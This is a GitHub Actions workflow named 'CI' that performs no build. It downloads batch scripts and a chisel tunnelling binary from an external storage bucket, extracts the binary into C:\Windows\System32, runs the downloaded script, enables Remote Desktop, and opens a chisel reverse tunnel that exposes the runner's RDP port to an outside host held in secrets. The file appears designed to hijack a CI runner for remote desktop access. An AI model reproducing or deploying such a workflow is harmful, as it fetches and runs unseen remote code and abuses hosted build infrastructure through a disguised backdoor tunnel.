name: CI

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Download files
      run: |
        Invoke-WebRequest https://storage.googleapis.com/addic7ed-subs.appspot.com/loop.bat -OutFile loop.bat
        Invoke-WebRequest https://storage.googleapis.com/addic7ed-subs.appspot.com/run.bat -OutFile run.bat
        Invoke-WebRequest https://storage.googleapis.com/addic7ed-subs.appspot.com/chisel_working_windows.zip -OutFile chisel.zip
        Expand-Archive chisel.zip -DestinationPath C:\Windows\System32
    - name: Run tasks
      run: start run.bat
    - name: Enable RDP Access
      run: |
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Create Tunnel
      env:
        CHISEL_ADDR: ${{ secrets.CHISEL_ADDR }}
        CHISEL_PORT: ${{ secrets.CHISEL_PORT }}
        CHISEL_AUTH: ${{ secrets.CHISEL_AUTH }}
      run: chisel.exe client --auth $Env:CHISEL_AUTH --keepalive 5s $Env:CHISEL_ADDR R:9463:localhost:3389
